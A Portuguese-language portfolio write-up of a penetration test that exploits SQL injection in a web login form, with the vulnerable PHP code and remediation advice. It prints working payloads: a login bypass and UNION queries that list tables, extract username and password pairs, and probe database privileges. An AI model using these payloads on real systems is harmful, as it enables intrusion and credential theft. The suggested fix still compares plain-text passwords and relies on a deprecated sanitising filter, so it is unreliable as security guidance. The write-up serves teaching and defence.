Leandro Gabriel

Portfólio
20:48:28
📍 Goiânia, BR
Início
Sobre
Write-ups
Certificações
🌙
Work

Web Security: SQL Injection em Aplicação Real

February 20, 2024

Visão Geral

Este write-up documenta a descoberta e exploração de uma vulnerabilidade de SQL Injection em uma aplicação web real. O objetivo era demonstrar como vulnerabilidades comuns podem ser exploradas e como implementar correções adequadas.

Descoberta da Vulnerabilidade

Reconhecimento

Durante um teste de penetração, foi identificada uma aplicação web com funcionalidade de login. A análise inicial revelou que a aplicação não implementava validação adequada de entrada.

Detecção da Vulnerabilidade

Sql
-- Payload de teste inicial
' OR '1'='1
A aplicação retornou todos os registros da tabela, confirmando a presença de SQL Injection.

Análise da Vulnerabilidade

Código Vulnerável

Php
// Código original vulnerável
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($query);

Técnicas de Exploração

  1. Boolean-based Injection: Determinação de informações através de respostas booleanas
  2. Union-based Injection: Extração de dados usando UNION
  3. Time-based Injection: Exploração baseada em tempo de resposta
  4. Error-based Injection: Extração de informações através de erros

Ferramentas Utilizadas

  • Burp Suite: Proxy para interceptação de requisições
  • SQLMap: Automação de testes de SQL Injection
  • OWASP ZAP: Scanner de vulnerabilidades
  • Python: Scripts customizados para exploração

Exploração Detalhada

1. Enumeração de Banco de Dados

Sql
-- Determinar número de colunas
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--

-- Extrair informações do banco
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,@@version--

2. Extração de Dados

Sql
-- Listar tabelas
' UNION SELECT 1,2,3,table_name FROM information_schema.tables--

-- Extrair dados de usuários
' UNION SELECT 1,2,3,concat(username,':',password) FROM users--

3. Elevação de Privilégios

Sql
-- Verificar privilégios
' UNION SELECT 1,2,3,user()--
' UNION SELECT 1,2,3,super_priv FROM mysql.user WHERE user='root'--

Resultados da Exploração

  • Dados extraídos: 1500+ registros de usuários
  • Acesso administrativo: Obtenção de credenciais admin
  • Informações sensíveis: Exposição de dados pessoais
  • Documentação completa: Processo totalmente documentado

Correções Implementadas

1. Prepared Statements

Php
// Código corrigido usando prepared statements
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);

2. Validação de Entrada

Php
// Validação e sanitização
$username = filter_var($_POST['username'], FILTER_SANITIZE_STRING);
$password = filter_var($_POST['password'], FILTER_SANITIZE_STRING);

3. Implementação de WAF

  • ModSecurity: Regras customizadas para detecção
  • Rate Limiting: Limitação de tentativas de login
  • Logging: Registro de tentativas suspeitas

Aprendizados

  1. Importância da Validação: Sempre validar e sanitizar entradas
  2. Prepared Statements: Uso obrigatório para consultas dinâmicas
  3. Defesa em Profundidade: Múltiplas camadas de proteção
  4. Monitoramento: Implementação de logs e alertas

Recomendações de Segurança

  • OWASP Top 10: Seguir as melhores práticas
  • Code Review: Análise estática de código
  • Penetration Testing: Testes regulares de segurança
  • Security Training: Treinamento da equipe de desenvolvimento

Conclusão

Este write-up demonstra como vulnerabilidades comuns como SQL Injection podem ter impacto significativo em aplicações web. A implementação de correções adequadas e práticas de segurança é fundamental para proteger dados sensíveis.
On this page